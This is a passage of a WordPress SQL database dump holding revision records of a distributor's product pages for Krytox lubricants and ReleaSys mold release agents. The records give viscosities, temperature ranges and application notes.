The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \n\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\n', 'GPL 220', 'Krytox GPL 220 has a Oil Viscosity of 5.5 cSt at 40°C. \n<br /><br />\nEstimated useful temperature range is -70°C to 66°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '410-autosave-v1', '', '', '2016-10-04 14:31:17', '2016-10-04 14:31:17', '', 410, 'https://www.miller-stephenson.com/410-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2251, 2, '2016-10-04 14:42:31', '2016-10-04 14:42:31', 'This grease provides protection from rusting, hightemperature corrosion, and antiwear. It has excellent lubrication over a broad temperature range. Krytox GPL 226 is nonflammable, oxygen compatible, and chemically inert. Krytox® allows extended lubrication intervals and longer equipment life.\n\nTypical applications include corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, linear bearings, high-temperature fans,\nclean rooms, chlorine service, textile equipment, tenter frames, high-speed motors, instrument bearings, sealed for life motors, conveyor system in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, CV joints, wheel bearings, universal joints, clutch throwout bearings, paint plant conveyor bearings, ventilation fan bearings, valve lubrication, and starter bearings.\n\nThe fully fluorinated Krytox GPL 226 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\n\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \n\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\n', 'GPL 226', 'Krytox GPL 226 has a Oil Viscosity of 243 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -36°C to 260°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '850-autosave-v1', '', '', '2016-10-04 14:42:31', '2016-10-04 14:42:31', '', 850, 'https://www.miller-stephenson.com/850-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2252, 2, '2016-10-04 15:07:57', '2016-10-04 15:07:57', 'One of the greatest advantages of using Krytox GPL 103 oil is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\n\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\n\nKrytox GPL 103 Oil is not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\n\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\n\nKrytox lubricants do not react with gaseous oxygen under shock loading or with liquid oxygen (LOX), nitrogen tetroxide, or inhibited red fuming nitric acid in impact tests. LOX impact tests were conducted in accordance with ASTM D2512. Other impact tests conducted at 214 J/cm2 (200 ft·lb/in2), according to the method described in ASTM Bulletin 250, also showed no reaction. Krytox lubricants have also been evaluated and certified by the BAM Federal Institute for Materials Research and Testing in Germany for reactivity with gaseous and liquid oxygen under pressure. Table 4, “Oxygen Compatibility of Krytox™ Lubricants,” shows oxygen compatibility of Krytox lubricants.\n\nKrytox GPL 100 oil is remarkably stable to radiation when compared with many materials used as lubricants or power fluids. Irradiation of Krytox lubricants causes minor depolymerization, with a consequent reduction in viscosity and formation of volatile products, but not solids or sludge. In one test exposure of a Krytox sample to an electron bombardment of 107 rad at ambient temperature in air resulted in a viscosity decrease of only 8%. The irradiated sample contained no sludge and was unchanged in appearance.\n', 'GPL 103', 'Krytox GPL 103 has a Oil Viscosity of 30 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -60°C to 154°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '438-autosave-v1', '', '', '2016-10-04 15:07:57', '2016-10-04 15:07:57', '', 438, 'https://www.miller-stephenson.com/438-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2253, 2, '2016-10-04 15:15:45', '2016-10-04 15:15:45', 'Some applications require electrical conductivity. Most greases act as insulators. This special grade of Krytox has been formulated with copper powder in grease to act as a conductor of electricity.\n\nKrytox oils provide long life and high-temperature stability and lubrication. The addition of copper powder also improves the thermal conductivity of the grease for applications where improved heat transfer is needed; however, it can increase bearing noise and wear. Because GPL 246 is formulated with our Krytox® GPL 106 base oil, it retains many of the properties\nof that oil. ', 'GPL 246', 'Some applications require electrical conductivity. Most greases act as insulators. This special grade of Krytox has been formulated with copper powder in grease to act as a conductor of electricity. Krytox oils provide long life and high-temperature stability and lubrication. The addition of copper powder also improves the thermal conductivity of the grease for applications where improved heat transfer is needed; however, it can increase bearing noise and wear. Because GPL 246 is formulated with our Krytox GPL 106 base oil, it retains many of the properties of that oil.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\n', 'inherit', 'closed', 'closed', '', '1088-autosave-v1', '', '', '2016-10-04 15:15:45', '2016-10-04 15:15:45', '', 1088, 'https://www.miller-stephenson.com/1088-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2254, 2, '2016-10-04 15:17:50', '2016-10-04 15:17:50', 'Krytox GPL-407 grease is made using a nonmelting thickener instead of the normal Krytox PTFE. This change from PTFE to silica boosts the temperature capability of the grease from approximately 316°C (600°F) to an upper limit determined by the evaporation/breakdown temperature of the oil. GPL-407 is made from GPL-107 oil, which, with proper ventilation, can withstand up to 399°C (750°F) and higher temperatures for brief periods.\n\nWith replenishment/relubrication, it can last longer. While GPL-407 is not meant to replace the GPL-200 series at temperatures below 288–316°C (550–600°F), it does extend the range for using fluorinated greases to beyond the 316°C (600°F) limit of PTFE and Teflon thickened greases.', 'GPL 407', 'Krytox GPL-407 grease is made using a nonmelting thickener instead of the normal Krytox PTFE. This change from PTFE to silica boosts the temperature capability of the grease from approximately 316 °C (600 °F) to an upper limit determined by the evaporation/breakdown temperature of the oil. GPL-407 is made from GPL-107 oil, which, with proper ventilation, can withstand up to 399 °C (750 °F) and higher temperatures for brief periods. With replenishment/re-lubrication, it can last longer. While GPL-407 is not meant to replace the GPL-200 series at temperatures below 288–316 °C (550–600 °F), it does extend the range for using fluorinated greases to beyond the 316 °C (600 °F) limit of PTFE and Teflon thickened greases. GPL 407 has higher oil separation than PTFE thickened greases and, therefore, might not last as long under equivalent conditions.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '1111-autosave-v1', '', '', '2016-10-04 15:17:50', '2016-10-04 15:17:50', '', 1111, 'https://www.miller-stephenson.com/1111-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2255, 36, '2016-10-04 16:49:44', '2016-10-04 16:49:44', '', '', '', 'publish', 'closed', 'closed', '', '2255', '', '', '2016-10-04 16:49:44', '2016-10-04 16:49:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/2255/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2256, 3, '2017-06-04 18:00:05', '2017-06-04 18:00:05', '<h2>ReleaSys™ 89 | High-Performance Release Agents</h2>\n<h3>Advanced Mold Release Chemistry in the convenience of a Aerosol Can</h3>\nReleaSys™ 89 is a nonflammable, low odor solvent-based, semi-permanent release agents designed to provide superior durability and high slip across a broad range of moldable substrates. ReleaSys™ 89 is designed to function as a superior composite mold release agent, particularly effective at FRP composite. vacuum bagging, polyurethane / extrusion PU and mandrel lay-up applications.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  This formulation is particularly effective on difficult molding application or abrasive substrates. ReleaSys 89 will not interfere with post-production finishing operation. Benefits of this product include:\n<ul>\n 	<li>Exceptional durability and surface adhesion</li>\n 	<li>High Slip;Ideal for complex mold geometries</li>\n 	<li>Improves quality of molded parts</li>\n 	<li>Minimal mold build up</li>\n</ul>\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.\n<h3>Numerous releases per application; No Messy transfer or post-molding cleaning</h3>\nThe application efficiency of ReleaSys™ composite mold release can be seen by the relatively small amounts of mold release agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications.To find out if semi-permanent technologies would work for your process<a href="https://www.miller-stephenson.com/tech-support/"> contact us and talk with one of our industry experts.</a>The relatively small amounts of mold release agents that need to be applied to the mold means that storage space is reduced. Products can be formulated ready-to-use -- making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications.\n<h3>Mold Release Agents S</h3>\nSpecific to use in molding of <strong><a href="https://www.miller-stephenson.com/composite-mold-release-agents/">composite </a></strong>and <strong><a href="https://www.miller-stephenson.com/polyurethane-mold-release-agents/">polyurethane materials</a></strong> are ReleaSys™ Mold Primers. These are an integral part of the Primer/Sealer/Release Agent combination (i.e. "the release system"), and are used to leverage the release agent properties to provide for an even greater number of releases between release agent application, along with easier release and greater part surface qualities.\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a></p>\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information which Mold release agent is right for you.</a></strong>', 'ReleaSys™ 89 | High-Performance Release Agents', 'ReleaSys 89 is a nonflammable, low odor solvent-based, semi-permanent mold release agent designed to provide superior durability and high slip across a broad range of moldable substrates. This formulation is particularly effective on difficult molding applications or abrasive substrates. ReleaSys 89 will not interfere with post-production finishing operation. Benefits of this product include:\n<ul>\n 	<li>Exceptional durability and surface adhesion</li>\n 	<li>High Slip;Ideal for complex mold geometries</li>\n 	<li>Ideal for Composites and Urethanes</li>\n 	<li>Improves quality of molded parts</li>\n 	<li>Minimal mold build up</li>\n</ul>', 'inherit', 'closed', 'closed', '', '425-autosave-v1', '', '', '2017-06-04 18:00:05', '2017-06-04 18:00:05', '', 425, 'https://www.miller-stephenson.com/425-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2257, 2, '2017-08-18 15:28:37', '2017-08-18 15:28:37', '<h2>Krytox 240AA High-Performance Aerospace &amp; Aviation Grease</h2>\n<h3>MIL-SPEC (MIL PRF-27617) &amp; NSF H-1 RATED GREASE</h3>\nApplications for Krytox 240AA lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\n\nIn the aerospace industry, Krytox 240AA grease is applied in various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\n\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high-speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden and can create debris which will contaminate the grease.\n\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AA', 'Krytox 240AA grease is the least viscous grease in the Krytox 240 Series. With a viscosity of 60 cSt at 20°C and 24.7 cSt at 38°C it is ideal for low viscosity grease applications. Ideal temperature range of Krytox 240AA is -51 to 177°C. This grease is also MIL PRF-27617 & NSF H-1 Rated for incidental food contact. \n<br><br/>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '642-autosave-v1', '', '', '2017-08-18 15:28:37', '2017-08-18 15:28:37', '', 642, 'https://www.miller-stephenson.com/642-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2258, 2, '2017-08-21 12:22:22', '2017-08-21 12:22:22', '<h2>Krytox 250AC Performance Aerospace &amp; Aviation Grease</h2>\n<h3>Molybdenum Disulfide Grease | Extreme pressure additive for highly loaded gears and bearings</h3>\nSince the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250AC is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\n\nKrytox greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\n\nKrytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\n\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\n\nAll standard grades of grease are thickened with high efficiency PTFE, whose formula is (CF2-CF2)n. This special high efficiency thickener has a melting point of 325°C (617 °F), and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.', '250AC', 'Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\n<br><br/>\nMid-Range viscosity.\n<br><br/>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '647-autosave-v1', '', '', '2017-08-21 12:22:22', '2017-08-21 12:22:22', '', 647, 'https://www.miller-stephenson.com/647-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2259, 0, '2016-10-04 18:47:55', '2016-10-04 18:47:55', '', '', '', 'publish', 'closed', 'closed', '', '2259', '', '', '2016-10-04 18:47:55', '2016-10-04 18:47:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/2259/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2260, 2, '2016-10-04 18:57:53', '2016-10-04 18:57:53', 'The NRT 8900 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \n\nKrytox™ greases in the NRT series have been speciallyformulated for reactive gas service. With Krytox™ base oil, the\nNRT greases have special thickeners and additives for use\nwith reactive gas or chemical applications.\n\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\n\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\n\nKrytox NRT 8900 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective valve packing and seal lubricant for O-rings', 'NRT 8900', 'Krytox NRT 8900 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective valve packing and seal lubricant for O-rings.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '868-autosave-v1', '', '', '2016-10-04 18:57:53', '2016-10-04 18:57:53', '', 868, 'https://www.miller-stephenson.com/868-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2261, 2, '2016-10-04 19:02:07', '2016-10-04 19:02:07', 'The Krytox NRT 8904 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \n\nKrytox NRT 8904 and NRT 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\n\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\n\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\n\nKrytox NRT 8904 grease has been formulated for use in cold to ambient conditions, and is recommended as a cost-effective valve packing and seal lubricant for O-rings\n', 'NRT 8904', 'Krytox NRT 8904 and 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '878-autosave-v1', '', '', '2016-10-04 19:02:07', '2016-10-04 19:02:07', '', 878, 'https://www.miller-stephenson.com/878-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2263, 2, '2016-10-04 19:20:55', '2016-10-04 19:20:55', 'The Krytox NRT 8906 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \n\nGreases in the Krytox NRT 8906 series have been specially formulated for reactive gas service. With Krytox base oil, the NRT greases have special thickeners and additives for use with reactive gas or chemical applications.\n\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\n\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\n\nKrytox NRT 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\n', 'NRT 8906', 'Krytox NRT 8904 and 8906 provide excellent lubrication options for valves, regulators, seals, and pump and motor bearings at a wide range of operating conditions.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '880-autosave-v1', '', '', '2016-10-04 19:20:55', '2016-10-04 19:20:55', '', 880, 'https://www.miller-stephenson.com/880-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2264, 2, '2016-10-04 19:22:57', '2016-10-04 19:22:57', 'The NRT 8900 series of Krytox oils and greases deliver nonreactive, nonflammable, long-lasting performance, even under the demanding temperatures and pressures of reactive gas service. Krytox NRT lubricants are compatible with oxygen and other reactive chemicals, and are extremely resistant to water washout. Krytox NRT lubricants are also compatible with polymers used in seals, O-rings, and valves. \n\nKrytox greases in the NRT 8900 series have been specially formulated for reactive gas service. With Krytox base oil, the NRT greases have special thickeners and additives for use with reactive gas or chemical applications.\n\nThe superior film-forming capability of Krytox lubricants provide a thick oil layer that reduces friction and wear, extending equipment life in severe duty applications. The non-oxidizing nature of the oils makes the greases last longer. The oils don’t gum up as they age; so, they won’t harden the greases and cause catastrophic failure. Krytox oils and greases are perfluoropolyether (PFPE) lubricants—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE). Many of the NRT series of Krytox greases are thickened with a unique polytetrafluoroethylene (PTFE) with the formula (CF2-CF2)n. This special high efficiency thickener has a melting point of 325 °C (617 °F), low molecular weight, and submicron (0.2 μm) particle size.\n\nAll NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). All NRT oils and greases have been tested by West German Federal Institute for Materials Testing (BAM). Chemours lubricants have been used in oxygen and reactive gas service for decades. Krytox lubricants have been independently tested by organizations, including BOC, Air Liquide, NASA, General Dynamics, and Praxair, and proven acceptable for oxygen and other reactive chemical compatibility.\n\nKrytox™ NRT 8908 grease is a special high-pressure oxygen paste with excellent lubrication over a broad temperature range. This product has been formulated with special oils and thickeners for use in the high pressure oxygen industry. Krytox™ NRT 8908 received a rating of 350 bar at 60 °C (140 °F) in the BAM oxygen reactivity test, making it a great choice for valves in high\npressure service.', 'NRT 8908', 'Krytox NRT 8908 grease is a special high-pressure oxygen paste with excellent lubrication over a broad temperature range. This product has been formulated with special oils and thickeners for use in the high-pressure oxygen industry. Krytox NRT 8908 received a rating of 350 bar at 60°C in the BAM oxygen reactivity test, making it a great choice for valves in high pressure service.\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '881-autosave-v1', '', '', '2016-10-04 19:22:57', '2016-10-04 19:22:57', '', 881, 'https://www.miller-stephenson.com/881-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2265, 0, '2016-10-05 12:52:50', '2016-10-05 12:52:50', '', '', '', 'publish', 'closed', 'closed', '', '2265', '', '', '2016-10-05 12:52:50', '2016-10-05 12:52:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/2265/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2266, 37, '2016-10-05 12:55:46', '2016-10-05 12:55:46', '', '', '', 'publish', 'closed', 'closed', '', '2266', '', '', '2016-10-05 12:55:46', '2016-10-05 12:55:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2266/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2267, 0, '2016-10-05 14:06:50', '2016-10-05 14:06:50', '', '', '', 'publish', 'closed', 'closed', '', '2267', '', '', '2016-10-05 14:06:50', '2016-10-05 14:06:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/2267/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2268, 38, '2016-10-05 14:22:01', '2016-10-05 14:22:01', '', '', '', 'publish', 'closed', 'closed', '', '2268', '', '', '2016-10-05 14:22:01', '2016-10-05 14:22:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/2268/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2269, 0, '2016-10-05 15:10:27', '2016-10-05 15:10:27', '', '', '', 'publish', 'closed', 'closed', '', '2269', '', '', '2016-10-05 15:10:27', '2016-10-05 15:10:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/2269/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2270, 0, '2016-10-05 15:11:37', '2016-10-05 15:11:37', '', '', '', 'publish', 'closed', 'closed', '', '2270', '', '', '2016-10-05 15:11:37', '2016-10-05 15:11:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/2270/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2271, 41, '2016-10-05 16:00:18', '2016-10-05 16:00:18', '', '', '', 'publish', 'closed', 'closed', '', '2271', '', '', '2016-10-05 16:00:18', '2016-10-05 16:00:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/2271/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2272, 2, '2016-10-05 17:36:04', '2016-10-05 17:36:04', 'Krytox XHT-ACX grease is a special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400°F). Krytox XHT AC series greases are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\n\nThe Krytox XHT-ACX series greases are an extension of the Krytox 240 series and Krytox GPL 22X series, but are designed to give higher performance in the 204–302°C (400–575 °F) range. Krytox XHT-AC series greases contain sodium nitrite to offer anti-corrosion performance. These greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\n\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox XHT-AC and XHT-ACX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox lubricants are the ideal choice in a wide range of industries and applications.\n\n<strong>Compatibility with Metals</strong>\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 °F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with 